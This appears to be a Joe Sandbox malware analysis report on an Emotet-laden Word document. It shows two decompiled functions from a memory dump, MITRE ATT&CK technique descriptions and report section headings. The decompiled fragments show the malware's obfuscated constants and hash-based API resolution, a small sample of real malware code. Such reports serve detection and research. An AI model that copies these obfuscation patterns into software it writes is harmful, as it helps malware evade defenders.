Opcode ID: 7e7ec6139e26a230cd8135b14def708b179dcfffbd3619458be635df9660073b
Instruction ID: a5edbfd13d14eb0c4f6e0983b37bf563ab83886872881cb5b6258c3c2bb2fc52
Opcode Fuzzy Hash: 7e7ec6139e26a230cd8135b14def708b179dcfffbd3619458be635df9660073b
Instruction Fuzzy Hash: 4CF069B191020CFFDF08EF94DD4A99EBFB4EB40304F10818CF805A6250D3B69B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 002C9A56, Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E002C9A56(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				unsigned int _v12;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				void* _t29;

				_t29 = __ecx;
				E002B602B(_t18);
				_v12 = 0x9a38;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x00004339;
				_v8 = 0x299d;
				_v8 = _v8 + 0xa1ce;
				_v8 = _v8 | 0xc5f89a67;
				_v8 = _v8 + 0x125d;
				_v8 = _v8 ^ 0xc5f8b599;
				_t22 = E002C07A9(0x9f217491, 0x9164b7cc, __ecx, __ecx, 0x24e);
				_t23 =  *_t22(_t29, __ecx, __edx, _a4, _t28, __ecx, __ecx); // executed
				return _t23;
			}

0x002c9a5f
0x002c9a63
0x002c9a68
0x002c9a72
0x002c9a7b
0x002c9a82
0x002c9a89
0x002c9a90
0x002c9a97
0x002c9a9e
0x002c9ab7
0x002c9ac0
0x002c9ac6

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 002C9AC0

Memory Dump Source

Source File: 0000000F.00000002.2345325449.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000F.00000002.2345321393.00000000002B0000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2345336657.00000000002CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: d65cde782a32ae4a61f5c671309387e83e2548c40be7c0fa0ef700a92d4bef80
Instruction ID: c90fc4d53b680bfff615ff84788a62b5dd3d15e25bfe497339a1a85d3097bc19
Opcode Fuzzy Hash: d65cde782a32ae4a61f5c671309387e83e2548c40be7c0fa0ef700a92d4bef80
Instruction Fuzzy Hash: 8BF037B1911218FFEB08DB94D94A8DEBAB8EF41314F10818CF40466240E7B51F648BA1

Uniqueness

Uniqueness Score: -1.00%

Function 002B5FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E002B5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E002B602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002C07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x002b5fb5
0x002b5fb6
0x002b5fb7
0x002b5fbb
0x002b5fbc
0x002b5fc1
0x002b5fcb
0x002b5fd7
0x002b5fde
0x002b5fe5
0x002b5ffc
0x002b5fff
0x002b6006
0x002b600d
0x002b601a
0x002b6025
0x002b602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 002B6025

Memory Dump Source

Source File: 0000000F.00000002.2345325449.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000F.00000002.2345321393.00000000002B0000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2345336657.00000000002CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 3cfd88833e1ee3d7eb973bd6275b1c25da7f4a486528241d7f18c0759c34379f
Instruction ID: 30cff61dc02357b2d63867e23577cc68476d623263c4a4eb447c60db68dbb83f
Opcode Fuzzy Hash: 3cfd88833e1ee3d7eb973bd6275b1c25da7f4a486528241d7f18c0759c34379f
Instruction Fuzzy Hash: B1F04FB0C11208FFDB08DFA0E94689EBFB8EB40340F20819CE409A7260E7715F159F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report dat_513543.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "dat_513543.doc"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: A5gd21klfqu9c6rs, Stream Size: 1117

General

VBA Code Keywords

VBA Code

VBA File Name: Owppnp8hah4xo788, Stream Size: 17915

General

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre